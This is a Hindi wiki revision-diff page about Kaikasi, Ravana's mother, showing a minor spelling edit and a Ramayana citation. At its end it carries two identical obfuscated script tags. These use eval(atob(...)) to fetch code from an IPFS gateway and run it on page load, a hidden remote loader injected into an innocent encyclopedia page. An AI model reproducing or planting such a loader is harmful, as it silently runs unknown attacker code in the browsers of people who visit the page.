Difference between revisions of "कैकसी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replacement - " मां " to " माँ ")
 
Line 1: Line 1:
*कैकसी [[रावण]] की मां का नाम था।  
+
*कैकसी [[रावण]] की माँ का नाम था।  
 
*[[लंका]] में सेना सहित [[राम]] के आगमन का समाचार जानकर वृद्धा कैकसी ने रावण को समझाने का पर्याप्त प्रयत्न किया कि वह [[सीता हरण|सीता-हरण]] के कारण राम जैसे सशक्त व्यक्ति को शत्रु बनाकर अपनी मृत्यु को आमन्त्रित कर रहा है, पर रावण नहीं माना। <ref>बाल्मीकि रामायण, युद्ध कांड, सर्ग 34, श्लोक 20-25</ref>
 
*[[लंका]] में सेना सहित [[राम]] के आगमन का समाचार जानकर वृद्धा कैकसी ने रावण को समझाने का पर्याप्त प्रयत्न किया कि वह [[सीता हरण|सीता-हरण]] के कारण राम जैसे सशक्त व्यक्ति को शत्रु बनाकर अपनी मृत्यु को आमन्त्रित कर रहा है, पर रावण नहीं माना। <ref>बाल्मीकि रामायण, युद्ध कांड, सर्ग 34, श्लोक 20-25</ref>
  

Latest revision as of 14:09, 2 June 2017

  • kaikasi ravan ki maan ka nam tha.
  • lanka mean sena sahit ram ke agaman ka samachar janakar vriddha kaikasi ne ravan ko samajhane ka paryapt prayatn kiya ki vah sita-haran ke karan ram jaise sashakt vyakti ko shatru banakar apani mrityu ko amantrit kar raha hai, par ravan nahian mana. [1]


tika tippani aur sandarbh

  1. balmiki ramayan, yuddh kaand, sarg 34, shlok 20-25

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>